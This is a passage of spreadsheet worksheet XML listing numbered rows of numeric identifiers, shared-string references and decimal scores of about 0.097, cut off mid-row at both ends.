      <c r="C7561" s="2" t="s">
        <v>7174</v>
      </c>
      <c r="D7561" s="2">
        <v>1.0</v>
      </c>
      <c r="E7561" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7561" s="2">
        <v>0.09773662551440328</v>
      </c>
    </row>
    <row r="7562" ht="15.75" customHeight="1">
      <c r="A7562" s="1">
        <v>17669.0</v>
      </c>
      <c r="B7562" s="2">
        <v>5.0475246E7</v>
      </c>
      <c r="C7562" s="2" t="s">
        <v>7175</v>
      </c>
      <c r="D7562" s="2">
        <v>1.0</v>
      </c>
      <c r="E7562" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7562" s="2">
        <v>0.09773662551440326</v>
      </c>
    </row>
    <row r="7563" ht="15.75" customHeight="1">
      <c r="A7563" s="1">
        <v>22123.0</v>
      </c>
      <c r="B7563" s="2">
        <v>3.0994855E7</v>
      </c>
      <c r="C7563" s="2" t="s">
        <v>7176</v>
      </c>
      <c r="D7563" s="2">
        <v>1.0</v>
      </c>
      <c r="E7563" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7563" s="2">
        <v>0.09773662551440326</v>
      </c>
    </row>
    <row r="7564" ht="15.75" customHeight="1">
      <c r="A7564" s="1">
        <v>22129.0</v>
      </c>
      <c r="B7564" s="2">
        <v>3.1024238E7</v>
      </c>
      <c r="C7564" s="2" t="s">
        <v>7177</v>
      </c>
      <c r="D7564" s="2">
        <v>1.0</v>
      </c>
      <c r="E7564" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7564" s="2">
        <v>0.09773662551440326</v>
      </c>
    </row>
    <row r="7565" ht="15.75" customHeight="1">
      <c r="A7565" s="1">
        <v>26460.0</v>
      </c>
      <c r="B7565" s="2">
        <v>1.732779E7</v>
      </c>
      <c r="C7565" s="2" t="s">
        <v>7171</v>
      </c>
      <c r="D7565" s="2">
        <v>1.0</v>
      </c>
      <c r="E7565" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7565" s="2">
        <v>0.09773662551440326</v>
      </c>
    </row>
    <row r="7566" ht="15.75" customHeight="1">
      <c r="A7566" s="1">
        <v>28291.0</v>
      </c>
      <c r="B7566" s="2">
        <v>2.5570931E7</v>
      </c>
      <c r="C7566" s="2" t="s">
        <v>7178</v>
      </c>
      <c r="D7566" s="2">
        <v>1.0</v>
      </c>
      <c r="E7566" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7566" s="2">
        <v>0.09773662551440326</v>
      </c>
    </row>
    <row r="7567" ht="15.75" customHeight="1">
      <c r="A7567" s="1">
        <v>28775.0</v>
      </c>
      <c r="B7567" s="2">
        <v>2.8433099E7</v>
      </c>
      <c r="C7567" s="2" t="s">
        <v>7179</v>
      </c>
      <c r="D7567" s="2">
        <v>1.0</v>
      </c>
      <c r="E7567" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7567" s="2">
        <v>0.09773662551440326</v>
      </c>
    </row>
    <row r="7568" ht="15.75" customHeight="1">
      <c r="A7568" s="1">
        <v>8324.0</v>
      </c>
      <c r="B7568" s="2">
        <v>5.3643821E7</v>
      </c>
      <c r="C7568" s="2" t="s">
        <v>7180</v>
      </c>
      <c r="D7568" s="2">
        <v>1.0</v>
      </c>
      <c r="E7568" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7568" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="7569" ht="15.75" customHeight="1">
      <c r="A7569" s="1">
        <v>10184.0</v>
      </c>
      <c r="B7569" s="2">
        <v>5.7385089E7</v>
      </c>
      <c r="C7569" s="2" t="s">
        <v>7180</v>
      </c>
      <c r="D7569" s="2">
        <v>1.0</v>
      </c>
      <c r="E7569" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7569" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="7570" ht="15.75" customHeight="1">
      <c r="A7570" s="1">
        <v>13704.0</v>
      </c>
      <c r="B7570" s="2">
        <v>3.6184582E7</v>
      </c>
      <c r="C7570" s="2" t="s">
        <v>7181</v>
      </c>
      <c r="D7570" s="2">
        <v>1.0</v>
      </c>
      <c r="E7570" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7570" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="7571" ht="15.75" customHeight="1">
      <c r="A7571" s="1">
        <v>16753.0</v>
      </c>
      <c r="B7571" s="2">
        <v>4.7593917E7</v>
      </c>
      <c r="C7571" s="2" t="s">
        <v>7182</v>
      </c>
      <c r="D7571" s="2">
        <v>1.0</v>
      </c>
      <c r="E7571" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7571" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="7572" ht="15.75" customHeight="1">
      <c r="A7572" s="1">
        <v>25041.0</v>
      </c>
      <c r="B7572" s="2">
        <v>1.2845577E7</v>
      </c>
      <c r="C7572" s="2" t="s">
        <v>7183</v>
      </c>
      <c r="D7572" s="2">
        <v>1.0</v>
      </c>
      <c r="E7572" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7572" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="7573" ht="15.75" customHeight="1">
      <c r="A7573" s="1">
        <v>29709.0</v>
      </c>
      <c r="B7573" s="2">
        <v>3.4377877E7</v>
      </c>
      <c r="C7573" s="2" t="s">
        <v>7184</v>
      </c>
      <c r="D7573" s="2">
        <v>1.0</v>
      </c>
      <c r="E7573" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7573" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="7574" ht="15.75" customHeight="1">
      <c r="A7574" s="1">
        <v>33365.0</v>
      </c>
      <c r="B7574" s="2">
        <v>7632037.0</v>
      </c>
      <c r="C7574" s="2" t="s">
        <v>7185</v>
      </c>
      <c r="D7574" s="2">
        <v>1.0</v>
      </c>
      <c r="E7574" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7574" s="2">
        <v>0.09748427672955977</v>
      </c>
    </row>
    <row r="7575" ht="15.75" customHeight="1">
      <c r="A7575" s="1">
        <v>767.0</v>
      </c>
      <c r="B7575" s="2">
        <v>2.1057455E7</v>
      </c>
      <c r="C7575" s="2" t="s">
        <v>7186</v>
      </c>
      <c r="D7575" s="2">
        <v>1.0</v>
      </c>
      <c r="E7575" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7575" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7576" ht="15.75" customHeight="1">
      <c r="A7576" s="1">
        <v>1402.0</v>
      </c>
      <c r="B7576" s="2">
        <v>2.63047E7</v>
      </c>
      <c r="C7576" s="2" t="s">
        <v>7187</v>
      </c>
      <c r="D7576" s="2">
        <v>1.0</v>
      </c>
      <c r="E7576" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7576" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7577" ht="15.75" customHeight="1">
      <c r="A7577" s="1">
        <v>2710.0</v>
      </c>
      <c r="B7577" s="2">
        <v>3.4877025E7</v>
      </c>
      <c r="C7577" s="2" t="s">
        <v>7188</v>
      </c>
      <c r="D7577" s="2">
        <v>1.0</v>
      </c>
      <c r="E7577" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7577" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7578" ht="15.75" customHeight="1">
      <c r="A7578" s="1">
        <v>4154.0</v>
      </c>
      <c r="B7578" s="2">
        <v>4.1442266E7</v>
      </c>
      <c r="C7578" s="2" t="s">
        <v>7189</v>
      </c>
      <c r="D7578" s="2">
        <v>1.0</v>
      </c>
      <c r="E7578" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7578" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7579" ht="15.75" customHeight="1">
      <c r="A7579" s="1">
        <v>4898.0</v>
      </c>
      <c r="B7579" s="2">
        <v>4.3900655E7</v>
      </c>
      <c r="C7579" s="2" t="s">
        <v>7190</v>
      </c>
      <c r="D7579" s="2">
        <v>1.0</v>
      </c>
      <c r="E7579" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7579" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7580" ht="15.75" customHeight="1">
      <c r="A7580" s="1">
        <v>4996.0</v>
      </c>
      <c r="B7580" s="2">
        <v>4.417758E7</v>
      </c>
      <c r="C7580" s="2" t="s">
        <v>7191</v>
      </c>
      <c r="D7580" s="2">
        <v>1.0</v>
      </c>
      <c r="E7580" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7580" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7581" ht="15.75" customHeight="1">
      <c r="A7581" s="1">
        <v>5490.0</v>
      </c>
      <c r="B7581" s="2">
        <v>4.5774274E7</v>
      </c>
      <c r="C7581" s="2" t="s">
        <v>7192</v>
      </c>
      <c r="D7581" s="2">
        <v>1.0</v>
      </c>
      <c r="E7581" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7581" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7582" ht="15.75" customHeight="1">
      <c r="A7582" s="1">
        <v>6360.0</v>
      </c>
      <c r="B7582" s="2">
        <v>4834707.0</v>
      </c>
      <c r="C7582" s="2" t="s">
        <v>7193</v>
      </c>
      <c r="D7582" s="2">
        <v>1.0</v>
      </c>
      <c r="E7582" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7582" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7583" ht="15.75" customHeight="1">
      <c r="A7583" s="1">
        <v>7299.0</v>
      </c>
      <c r="B7583" s="2">
        <v>5.0837609E7</v>
      </c>
      <c r="C7583" s="2" t="s">
        <v>7194</v>
      </c>
      <c r="D7583" s="2">
        <v>1.0</v>
      </c>
      <c r="E7583" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7583" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7584" ht="15.75" customHeight="1">
      <c r="A7584" s="1">
        <v>7300.0</v>
      </c>
      <c r="B7584" s="2">
        <v>5.0837609E7</v>
      </c>
      <c r="C7584" s="2" t="s">
        <v>7195</v>
      </c>
      <c r="D7584" s="2">
        <v>1.0</v>
      </c>
      <c r="E7584" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7584" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7585" ht="15.75" customHeight="1">
      <c r="A7585" s="1">
        <v>7479.0</v>
      </c>
      <c r="B7585" s="2">
        <v>5.1352579E7</v>
      </c>
      <c r="C7585" s="2" t="s">
        <v>7196</v>
      </c>
      <c r="D7585" s="2">
        <v>1.0</v>
      </c>
      <c r="E7585" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7585" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7586" ht="15.75" customHeight="1">
      <c r="A7586" s="1">
        <v>7653.0</v>
      </c>
      <c r="B7586" s="2">
        <v>5.1791126E7</v>
      </c>
      <c r="C7586" s="2" t="s">
        <v>7197</v>
      </c>
      <c r="D7586" s="2">
        <v>1.0</v>
      </c>
      <c r="E7586" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7586" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7587" ht="15.75" customHeight="1">
      <c r="A7587" s="1">
        <v>9108.0</v>
      </c>
      <c r="B7587" s="2">
        <v>5.5177003E7</v>
      </c>
      <c r="C7587" s="2" t="s">
        <v>7198</v>
      </c>
      <c r="D7587" s="2">
        <v>1.0</v>
      </c>
      <c r="E7587" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7587" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7588" ht="15.75" customHeight="1">
      <c r="A7588" s="1">
        <v>10423.0</v>
      </c>
      <c r="B7588" s="2">
        <v>1.03198E7</v>
      </c>
      <c r="C7588" s="2" t="s">
        <v>7199</v>
      </c>
      <c r="D7588" s="2">
        <v>1.0</v>
      </c>
      <c r="E7588" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7588" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7589" ht="15.75" customHeight="1">
      <c r="A7589" s="1">
        <v>10597.0</v>
      </c>
      <c r="B7589" s="2">
        <v>1.3580794E7</v>
      </c>
      <c r="C7589" s="2" t="s">
        <v>7200</v>
      </c>
      <c r="D7589" s="2">
        <v>1.0</v>
      </c>
      <c r="E7589" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7589" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7590" ht="15.75" customHeight="1">
      <c r="A7590" s="1">
        <v>10706.0</v>
      </c>
      <c r="B7590" s="2">
        <v>1.4916516E7</v>
      </c>
      <c r="C7590" s="2" t="s">
        <v>7201</v>
      </c>
      <c r="D7590" s="2">
        <v>1.0</v>
      </c>
      <c r="E7590" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7590" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7591" ht="15.75" customHeight="1">
      <c r="A7591" s="1">
        <v>11588.0</v>
      </c>
      <c r="B7591" s="2">
        <v>2.2881036E7</v>
      </c>
      <c r="C7591" s="2" t="s">
        <v>7202</v>
      </c>
      <c r="D7591" s="2">
        <v>1.0</v>
      </c>
      <c r="E7591" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7591" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7592" ht="15.75" customHeight="1">
      <c r="A7592" s="1">
        <v>11888.0</v>
      </c>
      <c r="B7592" s="2">
        <v>2.5096267E7</v>
      </c>
      <c r="C7592" s="2" t="s">
        <v>7203</v>
      </c>
      <c r="D7592" s="2">
        <v>1.0</v>
      </c>
      <c r="E7592" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7592" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7593" ht="15.75" customHeight="1">
      <c r="A7593" s="1">
        <v>12455.0</v>
      </c>
      <c r="B7593" s="2">
        <v>2.9338469E7</v>
      </c>
      <c r="C7593" s="2" t="s">
        <v>7204</v>
      </c>
      <c r="D7593" s="2">
        <v>1.0</v>
      </c>
      <c r="E7593" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7593" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7594" ht="15.75" customHeight="1">
      <c r="A7594" s="1">
        <v>12641.0</v>
      </c>
      <c r="B7594" s="2">
        <v>3.0364409E7</v>
      </c>
      <c r="C7594" s="2" t="s">
        <v>7205</v>
      </c>
      <c r="D7594" s="2">
        <v>1.0</v>
      </c>
      <c r="E7594" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7594" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7595" ht="15.75" customHeight="1">
      <c r="A7595" s="1">
        <v>12689.0</v>
      </c>
      <c r="B7595" s="2">
        <v>3.0706459E7</v>
      </c>
      <c r="C7595" s="2" t="s">
        <v>7206</v>
      </c>
      <c r="D7595" s="2">
        <v>1.0</v>
      </c>
      <c r="E7595" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7595" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7596" ht="15.75" customHeight="1">
      <c r="A7596" s="1">
        <v>13307.0</v>
      </c>
      <c r="B7596" s="2">
        <v>3.4519993E7</v>
      </c>
      <c r="C7596" s="2" t="s">
        <v>7207</v>
      </c>
      <c r="D7596" s="2">
        <v>1.0</v>
      </c>
      <c r="E7596" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7596" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7597" ht="15.75" customHeight="1">
      <c r="A7597" s="1">
        <v>13512.0</v>
      </c>
      <c r="B7597" s="2">
        <v>3.5473777E7</v>
      </c>
      <c r="C7597" s="2" t="s">
        <v>7208</v>
      </c>
      <c r="D7597" s="2">
        <v>1.0</v>
      </c>
      <c r="E7597" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7597" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7598" ht="15.75" customHeight="1">
      <c r="A7598" s="1">
        <v>14425.0</v>
      </c>
      <c r="B7598" s="2">
        <v>3.9259831E7</v>
      </c>
      <c r="C7598" s="2" t="s">
        <v>7209</v>
      </c>
      <c r="D7598" s="2">
        <v>1.0</v>
      </c>
      <c r="E7598" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7598" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7599" ht="15.75" customHeight="1">
      <c r="A7599" s="1">
        <v>15288.0</v>
      </c>
      <c r="B7599" s="2">
        <v>4.2420876E7</v>
      </c>
      <c r="C7599" s="2" t="s">
        <v>7210</v>
      </c>
      <c r="D7599" s="2">
        <v>1.0</v>
      </c>
      <c r="E7599" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7599" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7600" ht="15.75" customHeight="1">
      <c r="A7600" s="1">
        <v>16117.0</v>
      </c>
      <c r="B7600" s="2">
        <v>4.5419948E7</v>
      </c>
      <c r="C7600" s="2" t="s">
        <v>7211</v>
      </c>
      <c r="D7600" s="2">
        <v>1.0</v>
      </c>
      <c r="E7600" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7600" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7601" ht="15.75" customHeight="1">
      <c r="A7601" s="1">
        <v>16248.0</v>
      </c>
      <c r="B7601" s="2">
        <v>4.5774473E7</v>
      </c>
      <c r="C7601" s="2" t="s">
        <v>7192</v>
      </c>
      <c r="D7601" s="2">
        <v>1.0</v>
      </c>
      <c r="E7601" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7601" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7602" ht="15.75" customHeight="1">
      <c r="A7602" s="1">
        <v>16537.0</v>
      </c>
      <c r="B7602" s="2">
        <v>4.6767315E7</v>
      </c>
      <c r="C7602" s="2" t="s">
        <v>7212</v>
      </c>
      <c r="D7602" s="2">
        <v>1.0</v>
      </c>
      <c r="E7602" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7602" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7603" ht="15.75" customHeight="1">
      <c r="A7603" s="1">
        <v>16563.0</v>
      </c>
      <c r="B7603" s="2">
        <v>4.6861405E7</v>
      </c>
      <c r="C7603" s="2" t="s">
        <v>7213</v>
      </c>
      <c r="D7603" s="2">
        <v>1.0</v>
      </c>
      <c r="E7603" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7603" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7604" ht="15.75" customHeight="1">
      <c r="A7604" s="1">
        <v>17289.0</v>
      </c>
      <c r="B7604" s="2">
        <v>4.922133E7</v>
      </c>
      <c r="C7604" s="2" t="s">
        <v>7214</v>
      </c>
      <c r="D7604" s="2">
        <v>1.0</v>
      </c>
      <c r="E7604" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7604" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7605" ht="15.75" customHeight="1">
      <c r="A7605" s="1">
        <v>17300.0</v>
      </c>
      <c r="B7605" s="2">
        <v>4.926339E7</v>
      </c>
      <c r="C7605" s="2" t="s">
        <v>7215</v>
      </c>
      <c r="D7605" s="2">
        <v>1.0</v>
      </c>
      <c r="E7605" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7605" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7606" ht="15.75" customHeight="1">
      <c r="A7606" s="1">
        <v>18099.0</v>
      </c>
      <c r="B7606" s="2">
        <v>5.1701427E7</v>
      </c>
      <c r="C7606" s="2" t="s">
        <v>7216</v>
      </c>
      <c r="D7606" s="2">
        <v>1.0</v>
      </c>
      <c r="E7606" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7606" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7607" ht="15.75" customHeight="1">
      <c r="A7607" s="1">
        <v>18264.0</v>
      </c>
      <c r="B7607" s="2">
        <v>5.2188236E7</v>
      </c>
      <c r="C7607" s="2" t="s">
        <v>7217</v>
      </c>
      <c r="D7607" s="2">
        <v>1.0</v>
      </c>
      <c r="E7607" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7607" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7608" ht="15.75" customHeight="1">
      <c r="A7608" s="1">
        <v>18728.0</v>
      </c>
      <c r="B7608" s="2">
        <v>5.3695342E7</v>
      </c>
      <c r="C7608" s="2" t="s">
        <v>7218</v>
      </c>
      <c r="D7608" s="2">
        <v>1.0</v>
      </c>
      <c r="E7608" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7608" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7609" ht="15.75" customHeight="1">
      <c r="A7609" s="1">
        <v>18904.0</v>
      </c>
      <c r="B7609" s="2">
        <v>5.4174129E7</v>
      </c>
      <c r="C7609" s="2" t="s">
        <v>7219</v>
      </c>
      <c r="D7609" s="2">
        <v>1.0</v>
      </c>
      <c r="E7609" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7609" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7610" ht="15.75" customHeight="1">
      <c r="A7610" s="1">
        <v>19074.0</v>
      </c>
      <c r="B7610" s="2">
        <v>5.4617133E7</v>
      </c>
      <c r="C7610" s="2" t="s">
        <v>7220</v>
      </c>
      <c r="D7610" s="2">
        <v>1.0</v>
      </c>
      <c r="E7610" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7610" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7611" ht="15.75" customHeight="1">
      <c r="A7611" s="1">
        <v>19547.0</v>
      </c>
      <c r="B7611" s="2">
        <v>5.6041585E7</v>
      </c>
      <c r="C7611" s="2" t="s">
        <v>7221</v>
      </c>
      <c r="D7611" s="2">
        <v>1.0</v>
      </c>
      <c r="E7611" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7611" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7612" ht="15.75" customHeight="1">
      <c r="A7612" s="1">
        <v>20542.0</v>
      </c>
      <c r="B7612" s="2">
        <v>1.334475E7</v>
      </c>
      <c r="C7612" s="2" t="s">
        <v>7222</v>
      </c>
      <c r="D7612" s="2">
        <v>1.0</v>
      </c>
      <c r="E7612" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7612" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7613" ht="15.75" customHeight="1">
      <c r="A7613" s="1">
        <v>20666.0</v>
      </c>
      <c r="B7613" s="2">
        <v>1.4341178E7</v>
      </c>
      <c r="C7613" s="2" t="s">
        <v>7223</v>
      </c>
      <c r="D7613" s="2">
        <v>1.0</v>
      </c>
      <c r="E7613" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7613" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7614" ht="15.75" customHeight="1">
      <c r="A7614" s="1">
        <v>21000.0</v>
      </c>
      <c r="B7614" s="2">
        <v>1.7164378E7</v>
      </c>
      <c r="C7614" s="2" t="s">
        <v>7224</v>
      </c>
      <c r="D7614" s="2">
        <v>1.0</v>
      </c>
      <c r="E7614" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7614" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7615" ht="15.75" customHeight="1">
      <c r="A7615" s="1">
        <v>21311.0</v>
      </c>
      <c r="B7615" s="2">
        <v>2.0791419E7</v>
      </c>
      <c r="C7615" s="2" t="s">
        <v>7225</v>
      </c>
      <c r="D7615" s="2">
        <v>1.0</v>
      </c>
      <c r="E7615" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7615" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7616" ht="15.75" customHeight="1">
      <c r="A7616" s="1">
        <v>22253.0</v>
      </c>
      <c r="B7616" s="2">
        <v>3.2797313E7</v>
      </c>
      <c r="C7616" s="2" t="s">
        <v>7226</v>
      </c>
      <c r="D7616" s="2">
        <v>1.0</v>
      </c>
      <c r="E7616" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7616" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7617" ht="15.75" customHeight="1">
      <c r="A7617" s="1">
        <v>23321.0</v>
      </c>
      <c r="B7617" s="2">
        <v>5.4355646E7</v>
      </c>
      <c r="C7617" s="2" t="s">
        <v>7227</v>
      </c>
      <c r="D7617" s="2">
        <v>1.0</v>
      </c>
      <c r="E7617" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7617" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7618" ht="15.75" customHeight="1">
      <c r="A7618" s="1">
        <v>23734.0</v>
      </c>
      <c r="B7618" s="2">
        <v>7301510.0</v>
      </c>
      <c r="C7618" s="2" t="s">
        <v>7228</v>
      </c>
      <c r="D7618" s="2">
        <v>1.0</v>
      </c>
      <c r="E7618" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7618" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7619" ht="15.75" customHeight="1">
      <c r="A7619" s="1">
        <v>23866.0</v>
      </c>
      <c r="B7619" s="2">
        <v>8340296.0</v>
      </c>
      <c r="C7619" s="2" t="s">
        <v>7229</v>
      </c>
      <c r="D7619" s="2">
        <v>1.0</v>
      </c>
      <c r="E7619" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7619" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7620" ht="15.75" customHeight="1">
      <c r="A7620" s="1">
        <v>24124.0</v>
      </c>
      <c r="B7620" s="2">
        <v>1.0012419E7</v>
      </c>
      <c r="C7620" s="2" t="s">
        <v>7230</v>
      </c>
      <c r="D7620" s="2">
        <v>1.0</v>
      </c>
      <c r="E7620" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7620" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7621" ht="15.75" customHeight="1">
      <c r="A7621" s="1">
        <v>24444.0</v>
      </c>
      <c r="B7621" s="2">
        <v>1.0906023E7</v>
      </c>
      <c r="C7621" s="2" t="s">
        <v>7231</v>
      </c>
      <c r="D7621" s="2">
        <v>1.0</v>
      </c>
      <c r="E7621" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7621" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7622" ht="15.75" customHeight="1">
      <c r="A7622" s="1">
        <v>24821.0</v>
      </c>
      <c r="B7622" s="2">
        <v>1.2094967E7</v>
      </c>
      <c r="C7622" s="2" t="s">
        <v>7232</v>
      </c>
      <c r="D7622" s="2">
        <v>1.0</v>
      </c>
      <c r="E7622" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7622" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7623" ht="15.75" customHeight="1">
      <c r="A7623" s="1">
        <v>24849.0</v>
      </c>
      <c r="B7623" s="2">
        <v>1.2191345E7</v>
      </c>
      <c r="C7623" s="2" t="s">
        <v>7233</v>
      </c>
      <c r="D7623" s="2">
        <v>1.0</v>
      </c>
      <c r="E7623" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7623" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7624" ht="15.75" customHeight="1">
      <c r="A7624" s="1">
        <v>24927.0</v>
      </c>
      <c r="B7624" s="2">
        <v>1.2425333E7</v>
      </c>
      <c r="C7624" s="2" t="s">
        <v>7234</v>
      </c>
      <c r="D7624" s="2">
        <v>1.0</v>
      </c>
      <c r="E7624" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7624" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7625" ht="15.75" customHeight="1">
      <c r="A7625" s="1">
        <v>25582.0</v>
      </c>
      <c r="B7625" s="2">
        <v>1.4341177E7</v>
      </c>
      <c r="C7625" s="2" t="s">
        <v>7223</v>
      </c>
      <c r="D7625" s="2">
        <v>1.0</v>
      </c>
      <c r="E7625" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7625" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7626" ht="15.75" customHeight="1">
      <c r="A7626" s="1">
        <v>26335.0</v>
      </c>
      <c r="B7626" s="2">
        <v>1.6730869E7</v>
      </c>
      <c r="C7626" s="2" t="s">
        <v>7235</v>
      </c>
      <c r="D7626" s="2">
        <v>1.0</v>
      </c>
      <c r="E7626" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7626" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7627" ht="15.75" customHeight="1">
      <c r="A7627" s="1">
        <v>26522.0</v>
      </c>
      <c r="B7627" s="2">
        <v>1.7653429E7</v>
      </c>
      <c r="C7627" s="2" t="s">
        <v>7236</v>
      </c>
      <c r="D7627" s="2">
        <v>1.0</v>
      </c>
      <c r="E7627" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F7627" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="7628" ht="15.75" customHeight="1">
      <c r="A7628" s="1">
        <v>27133.0</v>
      </c>
      <c r="B7628" s="2">
        <v>2.074955E7</v>
      </c>
